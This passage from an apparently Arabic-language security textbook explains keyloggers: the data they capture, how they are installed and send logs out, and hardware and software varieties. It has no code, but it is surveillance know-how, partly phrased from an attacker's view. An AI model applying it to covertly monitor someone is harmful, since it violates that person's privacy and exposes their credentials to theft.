‫وھذا ھو أﺧطر ھذه اﻟﻛﺎﺋﻧﺎت واﻟذي ﯾﻌد ﻋﻣﻠﮫ أﺷﺑﮫ ﻣﺎ ﯾﻛون ﺑﻌﻣل ﺣﺻﺎن طروادة أﺣد أﻧواع ﻓﯾروﺳﺎت اﻟﺗﺟﺳس وﯾﺳﺗﺧدم ﻟﻣراﻗﺑﺔ أﺟﮭزة‬
‫ﻣﻌﯾﻧﺔ وﻣﻌرﻓﺔ ﻣﺎ ﯾﻛﺗب ﻋﻠﯾﮭﺎ‪ .‬ﻣﺛل ارﻗﺎم اﻟﺳر وﻛﻠﻣﺎت اﻟدﺧول ارﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ .‬أﻛﺛرﯾﺔ ﻣﺳﺗﺧدﻣﻲ ﺧدﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﯾوم‬
‫ﯾﻌرﻓون اﻟﺣد اﻷدﻧﻰ اﻟﻼزم ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟرﺳﺎﺋل اﻟﻛﺎذﺑﺔ اﻟﻣﺳﻣﺎة ‪Phishing‬و اﻟﺗﻲ ﺗﺻل ﺑﺎﺳم ﺷرﻛﺔ أو ﺑﻧك أو ﺷﺧص ﻣﻌﯾن ﻓﻲ‬
‫ﺣﯾن أﻧﮭﺎ ﻟﯾﺳت ﻣن اﻟﻣﺻدر اﻟﻣﻌﻠن ﻋﻧﮭﺎ وھدﻓﮭﺎ اﻟوﺣﯾد ھو ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺧﺎﺻﺔ ﺗﺳﺗﻌﻣﻠﮭﺎ ﻣﺛل ﻛﻠﻣﺎت ﻣرور ﺑﻧك أو أي ﻛﻠﻣﺎت ﻣرور‬
‫أﺧرى‪ .‬ھو ﻣﺛل اﻟﻣﺣول‪ ،‬ﺣﯾث ﻻ ﯾدرك اﻟﺷﺧص ان أﻧﺷطﺗﮫ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﯾﺗم رﺻدھﺎ‪ .‬ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺳﺗﺧدم ﻷﻏراض إﯾﺟﺎﺑﯾﺔ ﻣﺛل ﻓﻲ اﻟﻣﻛﺎﺗب‬
‫واﻟﻣواﻗﻊ اﻟﺻﻧﺎﻋﯾﺔ ﻟرﺻد أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﻣوظﻔﯾن وﻓﻲ ﺑﯾﺋﺎت اﻟﻣﻧزل ﺣﯾث ﯾﻣﻛن ﻟﻠواﻟدﯾن ﻣراﻗﺑﺔ ﻣﺎ ﺗﻘوم ﺑﮫ أطﻔﺎﻟﮭم ﻋﻠﻰ اﻹﻧﺗرﻧت‪.‬‬

‫‪ ، Keyloggers‬ﻋﻧدﻣﺎ ﯾرﺗﺑط ﻣﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس ‪ ،‬ﯾﺳﺎﻋد ﻋﻠﻰ ﻧﻘل اﻟﻣﻌﻠوﻣﺎت ﻟطرف ﺛﺎﻟث ﻏﯾر ﻣﻌروف‪ .‬ﯾﺗم اﺳﺗﺧداﻣﮫ ﺑﺷﻛل ﻏﯾر ﻗﺎﻧوﻧﻲ‬
‫ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻷﻏراض ﺧﺑﯾﺛﺔ ﻣﺛل ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ وﺳرﯾﺔ ﻣن اﻟﺿﺣﺎﯾﺎ‪ .‬ﯾﺗﺿﻣن ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ ﻣﻌرﻓﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪،‬‬
‫ﻛﻠﻣﺎت اﻟﺳر‪ ،‬اﻟﺗﻔﺎﺻﯾل اﻟﻣﺻرﻓﯾﺔ وﻧﺷﺎط ﻏرﻓﺔ اﻟدردﺷﺔ‪ ،IRC ،‬واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ‪ ،‬واﻟﺑﻧوك‪ ،‬وﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن واﻷرﻗﺎم‪ ،‬وﻏﯾرھﺎ ﻣن‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻧﺎس ﻛل ﯾوم‪ .‬اﻟﺑﯾﺎﻧﺎت‪ ،‬أي اﻟﺗﻲ ﺗﻧﺗﻘل ﻋﺑر اﻻﺗﺻﺎل اﻹﻧﺗرﻧت ﻣﺷﻔرة‪ ،‬ھﻲ أﯾﺿﺎ ﻋرﺿﺔ ﻟل‬
‫‪ Keyloggers‬ﻷن ‪ Keyloggers‬ﯾﺗﺗﺑﻊ ﺿرب اﻟﻣﻔﺎﺗﯾﺢ ﻗﺑل أن ﯾﺗم ﺗﺷﻔﯾرھﺎ ﻟﻧﻘﻠﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪402‬‬

‫ﯾﺗم ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ ‪ Keyloggers‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم ﺑﺧﻔﺎء ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﻣن ﺧﻼل ﺗﺣﻣﯾل " ‪" drive-by‬‬
‫ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدﻣون ﺑزﯾﺎرة ﺑﻌض اﻟﻣواﻗﻊ‪ Keystroke logger’s .‬ھﻲ ﺑراﻣﺞ ﺷﺑﺢ واﻟﺗﻲ ﺗﺟﻠس ﺑﯾن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻷﺟﮭزة وﻧظﺎم‬
‫اﻟﺗﺷﻐﯾل‪ ،‬ﺑﺣﯾث ﯾﻣﻛن ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪.‬‬

‫ﻛﯾف ﯾﻌﻣل ال‪Keylogger‬‬


‫ﻣﯾﻛﺎﻧﯾﻛﯾﺔ ﻋﻣﻠﮭﺎ ﺗﺧﺗﻠف ﻛﺛﯾرا ﻋن ﻣﯾﻛﺎﻧﯾﻛﯾﺔ اﻟﻌﻣل اﻟﺗﻲ ﺗﺗﺑﻌﮭﺎ ﻣﻌظم ﻓﯾروس اﻟﺣﺎﺳوب؛ ﻓﮭو ﯾدﺧل ﻋن طرﯾﻖ ﺛﻐرات اﻟﺣﻣﺎﯾﺔ و ﯾﻘوم ﺑﻣراﻗﺑﺔ‬
‫اﻟطرﯾﻖ اﻟذي ﺗﺄﺧذه اﻟﻣﻌﻠوﻣﺎت ‪ Security Flaws‬ﺑﺎﺗﺟﺎه أﺟزاء ‪ Keyboard‬ﻓﻲ طرﯾﻘﮭﺎ ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣﻌﺎﻟﺟﺔ وﺗﺣوﯾل ھذه اﻟﺑﯾﺎﻧﺎت‬
‫ﻓﻲ اﻟﻛﻣﺑﯾوﺗر‪ ...‬ھذا اﻷﺳﻠوب ‪ ،‬ﺑﺎﻟﺗﺄﻛد أﻛﺛر ﺧطورة ﻣن إﯾﻣﯾﻼت ال ‪ Phishing‬ﺣﯾث ان إﯾﻣﯾﻼت ال ‪ Phishing‬ﻟن ﺗﺳﺑب أي ﺿرر ﻣﺎ ﻟم‬
‫ﯾﻘم اﻟﻣﺳﺗﺧدم ﺑﺎﻟرد ﻋﻠﯾﮭﺎ أو ﺑﻔﺗﺢ ﺻﻔﺣﺎت اﻹﻧﺗرﻧت اﻟﺗﻲ ﺗﺣﺗوﯾﮭﺎ‪ ،‬ﻓﻲ ﺣﯾن ﺑﺎﻟﻧﺳﺑﺔ ﻟل ‪ Keylogger‬ﻓﺄﻧك ﻻ ﺗﺣﺗﺎج ﻷي رد ﻓﻌل ﻣن ﻗﺑل‬
‫اﻟﻣﺳﺗﺧدم ﺣﯾث أﻧﮫ ﯾﺑدأ ﻓﻲ ﻋﻣﻠﮫ ﺑﻣﺟرد ﺗﻣﻛﻧﮫ ﻣن اﻟﺗﺳﻠل إﻟﻰ ﺟﮭﺎزك‪ .‬ﻋن طرﯾﻖ ﺑراﻣﺞ ‪ Keylogger‬ﻓﺎﻧﮫ ﻣن اﻟﻣﻣﻛن أن ﯾﺻل إﻟﯾك ﻣن‬
‫ﺧﻼل ﺗﻧزﯾﻠﮭﺎ ﻣن ﻋﻠﻰ اﻹﻧﺗرﻧت دون ﻣﻌرﻓﺔ ﻣﺎھﯾﺗﮭﺎ ﺑﺷﻛل وافٍ ‪ ،‬أو ﻣن ﻣﻠﻔﺎت ﻣﺿﺎﻓﺔ إﻟﻰ إﯾﻣﯾﻼت أو ﻋن طرﯾﻖ ﻣﻠﻔﺎت ﻣﺗﺷﺎرﻛﺔ ﻓﻲ ﺑراﻣﺞ‬
‫اﻟﻣﺷﺎرﻛﺔ ﻣن ﻧوع )‪ .(Shared Files‬ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺈدﺧﺎل اﺳم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮫ‪ ،‬ﯾﻘوم ال‪ Keylogger‬ﺑﻧﺳﺦ ھذه‬
‫اﻟﻣﻌﻠوﻣﺎت )ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ﻋﻧوان أو ﺻورة اﻟﻣوﻗﻊ اﻟذي زاره( وﺣﻔظﮭﺎ ﻓﻲ ﻣﻠف‪ .‬ﺑﻌد ھذا ﯾﺗم إرﺳﺎل اﻟﻣﻠف إﻟﻰ ﻣوﻗﻊ ﻣﻌﯾن ﻋﻠﻰ اﻹﻧﺗرﻧت أو‬
‫إﻟﻰ ﺟﮭﺎز ﺳﯾرﻓر‪.‬‬

‫‪ Keylogger‬ﯾﻣﻛﻧﮫ اﻻﺗﻲ‪:‬‬

‫ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪ ،‬أي اﻟﺗﻲ ﻛﺗﺑت ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮫ‪.‬‬ ‫‪-1‬‬
‫اﻟﺗﻘﺎط ﻟﻘطﺎت )‪(screenshot‬ﻋﻠﻰ ﻓﺗرات ﻣﻧﺗظﻣﺔ ﻣن اﻟزﻣن واﻟﺗﻲ ﺗﺑﯾن ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻣﺛل طﺑﺎﻋﺔ ﺑﻌض اﻻﺣرف أو ﺑﺎﻟﻧﻘر ﻓوق‬ ‫‪-2‬‬
‫زر اﻟﻣﺎوس‪.‬‬
‫ﺗﺗﺑﻊ أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻋن طرﯾﻖ ﺗﺳﺟﯾل ﻋﻧﺎوﯾن اﻟﻧﺎﻓذة‪ ،‬أﺳﻣﺎء اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﺗم ﺗﺷﻐﯾﻠﮭﺎ‪ ،‬وﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت‪.‬‬ ‫‪-3‬‬
‫رﺻد ﻧﺷﺎط اﺳﺗﺧدام اﻻﻧﺗرﻧت ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﻋن طرﯾﻖ ﺗﺳﺟﯾل ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﺗﻲ ﻗﺎﻣوا ﺑزﯾﺎرﺗﮭﺎ وﻣﻊ اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ‬ ‫‪-4‬‬
‫اﻟﺗﻲ ﺗم ادﺧﺎﻟﮭﺎ‪ ،‬اﻟﺦ‬
‫ﺗﺳﺟﯾل ﺟﻣﯾﻊ أﺳﻣﺎء اﻟدﺧول‪ ،‬وأرﻗﺎم اﻟﺑﻧك وﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور وﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﻔﯾﺔ أو اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ھﻲ‬ ‫‪-5‬‬
‫ﻋﺑﺎره ﻋن ﻋﻼﻣﺎت اﻟﻧﺟﻣﺔ أو اﻟﻣﺳﺎﻓﺎت اﻟﻔﺎرﻏﺔ‪.‬‬
‫ﺗﺳﺟﯾل ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬ ‫‪-6‬‬
‫ﻋﻣل ﻧﺳﺦ ﻏﯾر ﻣﺻرح ﺑﮭﺎ ﻟﻛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺻﺎدرة ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة‪.‬‬ ‫‪-7‬‬

‫أﻧواع ‪(Types Of Keystroke Loggers) Keylogger‬‬


‫‪ Keylogger‬ھو ﺑرﻧﺎﻣﺞ ﺻﻐﯾر واﻟذي ﯾﻘوم ﺑﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻓﻲ أي وﻗت ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ ﻛﻣﺑﯾوﺗر ﻣﻌﯾﻧﺔ‪.‬‬
‫ﯾﺗم ﺣﻔظ اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣﺄﺳورة ﻓﻲ ﻣﻠف ﻟﻠﻘراءة ﻓﻲ وﻗت ﻻﺣﻖ أو ﺧﻼف ذﻟك ﺗﻧﺗﻘل إﻟﻰ ﻣﻛﺎن ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟوﺻول إﻟﯾﮫ‪ .‬ﻷن ھذا ﺑراﻣﺞ‬
‫ﯾﺳﺟل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﺧﻼل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﯾﻣﻛن اﻟﺗﻘﺎط ﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬وﻋﻧوان اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ وﻋﻧﺎوﯾن أﺳﻣﺎء‪ ،‬وأرﻗﺎم اﻟﮭواﺗف‪ Keylogger .‬ﻟدﯾﮭﺎ اﻟﻘدرة ﻋﻠﻰ اﻟﺗﻘﺎط اﻟﻣﻌﻠوﻣﺎت ﻗﺑل أن ﯾﺗم ﺗﺷﻔﯾرھﺎ ﻟﻧﻘﻠﮭﺎ ﻋﺑر اﻟﺷﺑﻛﺔ‪ .‬وھذا‬
‫ﯾﻌطﻲ وﺻول ﻟﻠﻣﮭﺎﺟم ﻟﺗﻣرﯾر ‪ phrases‬وﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ ﺑﺷﻛل ﺟﯾد‪.‬‬
‫ھﻧﺎك ﻧوﻋﺎن ﻣن ‪ .Keylogger‬ھم ‪ hardware loggers‬و‪ .software loggers‬وﯾﺳﺗﺧدم ھﺎذﯾن اﻻﺛﻧﯾن ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ ﺿرﺑﺎت‬
‫اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم إدﺧﺎﻟﮭﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗم اﻟﺗﺛﺑﯾت ﻓﯾﮫ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪403‬‬

‫‪Hardware Loggers -1‬‬

‫‪ Hardware Keyloggers‬ھو ﻋﺑﺎره ﻋن أﺟﮭزة ﺗﺑدو ﻣﺛل ﻣﺣرﻛﺎت أﻗراص ‪ .USB‬ﯾﻛون ﻣﺗﺻﻼ ﺑﯾن ﻣﻛوﻧﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ وﻣدﺧل‬
‫‪ .USB‬ﯾﺗم ﺗﺧزﯾن ﻛل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣﺳﺟﻠﺔ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﺿﻣن وﺣدة اﻷﺟﮭزة‪ .‬ﺛم ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن ﺑﺎﺳﺗرداد ھذه‬
‫اﻟوﺣدة ﻟﻠوﺻول إﻟﻰ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ذﻟك‪ .‬واﻟﻣﯾزة اﻟرﺋﯾﺳﯾﺔ ﻟﮭذا اﻟﻧوع ھو أﻧﮫ ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮫ ﻣن ﻗﺑل ﺑراﻣﺞ‬
‫ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس‪ ،‬وﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪ ،‬أو ﺑراﻣﺞ أﻣن ﺳطﺢ اﻟﻣﻛﺗب‪ .‬وﻟﻛن ﻣن ﻋﯾوﺑﮫ ھو أن ﻟﮫ وﺟود ﻓﻌﻠﻲ ﻣﻣﺎ ﯾﻣﻛن اﻛﺗﺷﺎﻓﮫ ﺑﺳﮭوﻟﺔ‪.‬‬
‫وﯾﺻﻧف ھذا اﻟﻧوع إﻟﻰ ﺛﻼﺛﺔ أﻧواع رﺋﯾﺳﯾﺔ‪:‬‬

‫‪PC/BIOS Embedded‬‬ ‫‪-‬‬

‫اﻟوﺻول اﻟﻣﺎدي و‪/‬أو ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم ﺿروري ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر)‪ ، (Physical and/or admin-level access‬ﯾﺟب أن ﯾﺗم‬
‫ﺗﺣﻣﯾل اﻟﺗطﺑﯾﻖ ﻓﻲ ‪ BIOS‬اﻟﻛﻣﺑﯾوﺗر ﻟﻸﺟﮭزة اﻟﺧﺎﺻﺔ اﻟﺗﻲ ﺳﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ‪ .‬ﺣﯾث ان اﻟﺑراﻣﺞ اﻟﺛﺎﺑﺗﺔ ﻋﻠﻰ ﻣﺳﺗوى ‪ BIOS‬اﻟﺗﻲ ﺗدﯾر إﺟراءات‬
‫ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﯾﻣﻛن ﺗﻌدﯾﻠﮭﺎ ﻻﻟﺗﻘﺎط ھذه اﻷﺣداث ﻣﺛﻠﻣﺎ ﯾﺗم ﻣﻌﺎﻟﺟﺗﮭﺎ‪.‬‬

‫‪Keylogger Keyboard‬‬ ‫‪-‬‬

‫ﯾﺳﺗﺧدم ھذا اﻟﻛﯾﻠوﺟرز ﻟﺗﺳﺟﯾل أﺣداث ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻋن طرﯾﻖ رﺑط داﺋرة اﻟﺟﮭﺎز ﻣﻊ ﻣوﺻل ﻛﺎﺑل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﻛل ﺿرﺑﺎت‬
‫ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟذاﻛرﺗﮫ اﻟداﺧﻠﯾﺔ اﻟﺧﺎﺻﺔ اﻟﺗﻲ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻓﻲ وﻗت ﻻﺣﻖ‪ .‬واﻟﻣﯾزة اﻟرﺋﯾﺳﯾﺔ ﻷﺟﮭزة اﻟﻛﯾﻠوﺟرز ﻋﻠﻰ ﺑراﻣﺞ اﻟﻛﯾﻠوﺟرز‬
‫ھو أﻧﮫ ﻻ ﯾﻌﺗﻣد ﻋﻠﻰ ﻧوع ﻧظﺎم اﻟﺗﺷﻐﯾل‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈﻧﮫ ﻟن ﯾﺗداﺧل ﻣﻊ أي ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف وأﻧﮫ ﻣن‬
‫اﻟﻣﺳﺗﺣﯾل اﻛﺗﺷﺎف أﺟﮭزة اﻟﻛﯾﻠوﺟرز ﺑﺎﺳﺗﺧدام أي ﻣن ﺑرﻧﺎﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻛﯾﻠوﺟرز‪.‬‬

‫‪External Keylogger‬‬ ‫‪-‬‬

‫‪ External Keyloggers‬ﯾﺗم رﺑطﮫ ﺑﯾن ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﻌﺗﺎدة واﻟﻛﻣﺑﯾوﺗر‪ .‬أﻧﮭﺎ ﺗﺳﺟل ﻛل ﺿﻐطﺔ ﻣﻔﺗﺎح‪ .‬ﻛﯾﻠوﺟرز اﻟﺧﺎرﺟﯾﺔ‬
‫)‪ (External Keyloggers‬ﻻ ﺗﺣﺗﺎج إﻟﻰ أي ﻣن اﻟﺑرﻧﺎﻣﺞ‪ ،‬وﺗﻌﻣل ﻣﻊ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛﻧك رﺑطﮭﺎ ﺑﺄي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﺗﺳﺗﮭدﻓﮫ‪،‬‬
‫ﺣﯾث ﯾﻣﻛﻧﮫ رﺻد اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻟﻠﺑﺣث ﻋن طرﯾﻖ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھﻧﺎك أرﺑﻌﺔ أﻧواع ﻣن ﻛﯾﻠوﺟرز‬
‫اﻟﺧﺎرﺟﯾﺔ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪404‬‬

‫‪ :PS/2 and USB Keylogger‬ﺷﻔﺎف ﺗﻣﺎﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻌﻣﻠﯾﺎت اﻟﺣﺎﺳوب وﻻ ﯾﺗطﻠب أي ﻣن اﻟﺑراﻣﺞ أو ‪ driver’s‬ﻟﻛﻰ ﯾﻌﻣل‪ .‬ﺗﺳﺟﯾل‬
‫ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت ﻣﺛل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪،‬‬
‫وﺳﺟﻼت اﻟدردﺷﺔ‪ ،‬اﻟﺗطﺑﯾﻘﺎت اﻟﻣﺳﺗﻌﻣﻠﺔ‪ ،IMS ،‬اﻟﺦ‪.‬‬

‫‪ :Acoustic/CAM Keylogger‬ﯾﻣﻛﻧﮫ اﺳﺗﺧدام إﻣﺎ ﺟﮭﺎز اﺳﺗﻘﺑﺎل )‪ (capturing receiver‬ﻗﺎدرة ﻋﻠﻰ ﺗﺣوﯾل اﻷﺻوات‬
‫اﻟﻛﮭروﻣﻐﻧﺎطﯾﺳﯾﺔ اﻟﻰ ﺑﯾﺎﻧﺎت اﻟﻣﻔﺎﺗﯾﺢ أو ‪ CAM‬اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ ﺗﺳﺟﯾل ﻟﻘطﺎت ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬

‫‪ :Bluetooth Keylogger‬ﯾﺗطﻠب اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻣرة واﺣدة ﻓﻘط‪ ،‬ﻓﻲ وﻗت اﻟﺗﺛﺑﯾت‪ .‬ﻣرة واﺣدة ﯾﺗم ﺗﺛﺑﯾت ھذا‬
‫ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‪ ،‬ﻓﺈﻧﮫ ﯾﺧزن ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ وﯾﻣﻛﻧك اﺳﺗرداد ﻣﻌﻠوﻣﺎت ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻣن ﺧﻼل رﺑط‬
‫ﺑﺟﮭﺎز اﻟﺑﻠوﺗوث‪.‬‬

‫‪ :Wi-Fi Keylogger‬ﯾﻌﻣل ﻟوﺣده ﺗﻣﺎﻣﺎ‪ .‬ﻋﻠﻰ ﻋﻛس ‪ ،Bluetooth Keylogger‬ھذا اﻟﻧوع ﻣن اﻟﻛﯾﻠوﺟرز ﻻ ﺗﺗطﻠب أن ﯾﻛون ﺑﺎﻟﻘرب‬
‫ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺛﺑت ﻋﻠﯾﮫ اﻟدوﻧﺟل )ﺟﮭﺎز اﻟﺗﺳﺟﯾل ﻓﻲ ‪ (Bluetooth Keylogger‬ﻻﺳﺗرداد ﻣﻌﻠوﻣﺎت ﺿﻐطﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھذا‬
‫اﻟﻛﯾﻠوﺟرز ﻻ ﯾﺗطﻠب أي ﻣن اﻟﺑراﻣﺞ أو ‪ drivers‬وﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف ﺗﻣﺎﻣﺎ؛ وﯾﻌﻣل ﻋﻠﻰ أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ .‬ﯾﻘوم ﺑﺗﺳﺟل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‬
‫وﯾرﺳل اﻟﻣﻌﻠوﻣﺎت ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ ﻣدى ﻓﺗرة زﻣﻧﯾﺔ ﻣﺣددة ﻣﺳﺑﻘﺎ‪.‬‬

‫‪Software Keystroke Loggers -2‬‬

‫ھذا اﻟﻧوع ﻣن ‪ Loggers‬ھو ﻋﺑﺎره ﻋن ﺑراﻣﺞ ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋن ﺑﻌد ﻋﺑر اﻟﺷﺑﻛﺔ أو ﻣرﻓﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻟﺗﺳﺟﯾل‬
‫ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ھﻧﺎ ﯾﺗم ﺗﺧزﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻣﺛل ﻣﻠف اﻟﺳﺟل ﻓﻲ اﻟﻘرص اﻟﺻﻠب ﻷﺟﮭزة‬
